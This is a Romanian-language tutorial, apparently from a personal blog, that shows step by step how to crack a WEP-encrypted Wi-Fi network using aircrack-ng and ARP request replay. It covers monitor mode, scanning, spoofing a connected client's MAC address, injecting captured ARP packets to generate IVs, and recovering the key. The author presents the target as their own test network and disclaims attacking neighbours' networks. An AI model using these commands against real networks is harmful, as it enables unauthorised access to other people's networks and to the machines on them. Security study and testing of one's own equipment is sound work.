Insecuritatea retelelor wireless cu criptare WEP
Cum se poate sparge WEP-ul cu ARP Request Reply

Tutorial Wireless WEPCu toate ca retelele wireless securizate prin criptare WEP nu mai sunt considerate sigure pentru ca prezinta anumite vulnerabilitati, va asigur ca in anumite cazuri nu se poate sparge nici criptarea WEP chiar atat de usor, insa avem mai multe optiuni. Tocmai din cauza securitatii scazute aceste retele nu mai sunt asa de comune cum au fost acum cativa ani, dar inca mai pot fi intalnite chiar si in orasele mai mari, ca sa nu mai vorbim despre locuri mai ascunse unde utilizatorii nu sunt tocmai la zi cu cele mai noi tendinte din securitatea IT. In ultima vreme apar routere din ce in ce mai sofisticate, care pot oferi securitate chiar si utilizand criptare WEP, daca sunt bine configurate si administrate, asa ca sa nu va surprinda nici situatia cand nu reusiti sa va conectati la o retea criptata cu WEP. Dar haideti sa vedem metoda cea mai eficienta si sigura de a sparge criptarea WEP, dupa parerea mea. In acest tutorial voi folosi sistemul de operare Gentoo Linux, si cateva utilitare pe care le voi prezenta succint.

Cum se sparge criptarea WEP cu metoda ARP Request Reply (Redarea cererilor ARP inregistrate anterior)

Unelte de care avem nevoie
– o placa de retea wirelss care suporta injectarea de pachete (eu am folosit BroadCom WiFi Link 5100); in anumite cazuri este nevoie sa aplicati un patch la driverul de placa de retea wifi pentru a putea injecta pachete.

– programul aircrack-ng care contine: aircrack-ng, airodump-ng, aireplay-ng – recomand sa descarcati ultima versiune a programului, si sa-l compilati local, pentru ca in majoritatea distributiilor nu veti gasi ultima versiune a programului; (in aceasta dremonstratie eu voi folosi versiunea 1.1

– o retea wireless cu criptare WEP, care sa nu fie prea departe (in caz contrar este posibil sa decryptati cheia wep, dar sa nu reusiti sa va conectati la retea) – asta e din cauza ca routerele au o putere de transmisie mai mare decat o placa de retea wireless.

– un client conectat la reteaua respectiva, altul decat dumneavoastra

Teoria

Cum functioneaza acest tip de atac? Relativ simplu: seamana cu un fel de ARP poisoning. Prima data punem placa wireless in “monitored mode” pentru a putea captura si injecta pachete. Scanam reteaua, notam BSSID-ul retelei pe care vrem sa o spargem si adresa MAC a unui client conectat la aceasta retea. Capturam pachetele transmise intre clientul conectat si AP (AccessPoint, adica router). Dupa ce am capturat cateva pachete, oprim salvarea pachetelor si folosim pachetele capturate pentru injectare. Ce inseamna injectarea? Trimitem pachetele capturate catre AP in numele clientului si astfel generam trafic ARP, care va determina routerul sa genereze mai multe IV-uri (Initialization Vectors) de care avem nevoie pentru decriptarea cheii WEP. Salvam pachetele ARP, atat cele trimise, cat si cele capturate. Monitorizam traficul pana cand adunam o cantitate de date suficienta pentru a sparge parola. Dupa ce am asteptat si am salvat pachetele ARP, oprim capturarea pachetelor, care va rezulta in obtinerea unui fisier cu extensie cap. Cu ajutorul programului aircrack-ng acum vom reusi sa decriptam cheia WEP, daca am monitorizat destul de mult timp traficul si daca intre client si AP era intr-adevar si trafic. Dupa ce am obtinut cheia WEP, pur si simplu putem sa ne conectam la AP, adica vom avea internet sau vom fi o parte a retelei wireles, ba chiar vom putea scana si calculatoarele conectate la routerul respectiv. Atentie, la acest tip de atac neaparat trebuie sa capturam traficul intre cel putin un client conectat si AP.

Cum se face

1: Pornim placa de retea wireless in “monitored mode”:

istvan@it $ airmon-ng stop wlan0

istvan@it # airmon-ng start wlan0

2: Scanam reteaua

istvan@it # airodump-ng wlan0

wifi
3: Notam BSSID-ul retelei, notam ESSID (adica numele retelei), si adresa de MAC a unui client conectat la AP!

4: Capturam pachetele transmise intre clientul conectat si AP!  Prima data capturam un arp reply, dupa care trimitem si noi pachete ARP copii ale pachetului capturat, apoi  iarasi capturam pachetele ARP.

1: aireplay-ng -3 -b 1C:BD:B9:C1:BA:AE wlan0

2: aireplay-ng -3 -b 1C:BD:B9:C1:BA:AE -h 00:18:DE:6F:65:16 -r replay_arp-0602-133453.cap wlan0

-3 = standard ARP-request replay
-b = BSSID, MAC address, Access Point
-h = source MAC, (se recomanda a fi adresa MAC a clientului conectat)
-r = citirea pachetelor din fisierul pcap
5: Oprim capturarea pachetelor cam dupa un minut, apasand Ctrl+c

6: Trimitem pachetele capturate catre AP specificand sursa MAC a clientului conectat!

istvan@it # aireplay-ng -2 -h 00:18:DE:6F:65:16 -r replay_arp-0602-133453.cap  wlan0
The interface MAC (00:16:EA:56:72:A4) doesn’t match the specified MAC (-h).
ifconfig wlan0 hw ether 00:18:DE:6F:65:16

WEP Wireless
Tastam Y pentru selectarea si trimiterea pachetelor catre AP, si lasam deschisa consola respectiva aproape pana la finalizarea atacului. .

-2 = interactive frame selection

7: Pornim un terminal nou si executam comanda pentru salvarea pachetelor ARP.

istvan@it # aireplay-ng -3 -b 1C:BD:B9:C1:BA:AE wlan0

No source MAC (-h) specified. Using the device MAC (00:16:EA:56:72:A4)

15:46:14 Waiting for beacon frame (BSSID: 1C:BD:B9:C1:BA:AE) on channel 11

Saving ARP requests in replay_arp-0602-154614.cap

You should also start airodump-ng to capture replies.

^Cad 64 packets (got 0 ARP requests and 0 ACKs), sent 0 packets…(0 pps)

Asteptam sa primim respunsuri ARP, lasand deschisa consola.

8: Deschidem o consola noua, si capturam raspunsurile ARP

istvan@it $ airodump-ng -w wep -c 11 –bssid 1C:BD:B9:C1:BA:AE wlan0

Wep Scan
Asteptam pana ce la #Data vedem cel putin 50000, dar cu cat asteptam mai mult, cu atat sansele de reusita sunt mai mari. Cu cat colectam mai multe pachete care contin, bineinteles, mai multe IV-uri, cu atat sunt mai mari sansele ca algoritmii din aircrack sa poata descifra cheia WEP. Cand am scris acest tutorial, am asteptat pana ce am capturat 160000 de pachete.

9: Oprim cu ctrl+c  airodump, si astfel, in directorul respectiv, de unde am pornit airodump, vom avea un fisier numit wep-01.cap.

10: Decriptam cu aircrack-ng cheia WEP.

istvan@it # aircrack-ng wep-01.cap

Asa arata o cheie WEP:

Tutorial WEP
Dupa cum vedeti cheia WEP a fost aflata, si in ASCII este “istva“. Aceasta retea a fost creeata de mine, ca exemplu pentru aceasta demonstratie. Nu ma intelegeti gresit, prin acest tutorial nu incurajez pe nimeni sa atace retelele WEP ale vecinilor. Mai sunt si alte metode prin care se pot ataca retelele wireless. Foarte probabil ca in viitor voi mai demonstra si alte situatii, si voi oferi informatii referitoare si la posibile atacuri impotriva retelelor wpa/wpa2. Tocmai din aceasta cauza firmele mari si serioase nu conecteaza retelele importante la internet si nici nu dau acces la reteaua interna prin wireless.

Glosar

ESSID = (Extended Service Set IDentifier), numele retelei, care este de obicei format din caractere normale, litere

BSSID = (Basic Service Set IDentifier), adresa MAC a routerului, a AP (Access Point)

AP = (Access Point), de obicei un router, sau un alt calculator cu placa de retea wireless care ofera posibilitate de conexiune wireless “multi la unul”

IV = (Initialization Vectors)

Lasă un răspuns

(*)


*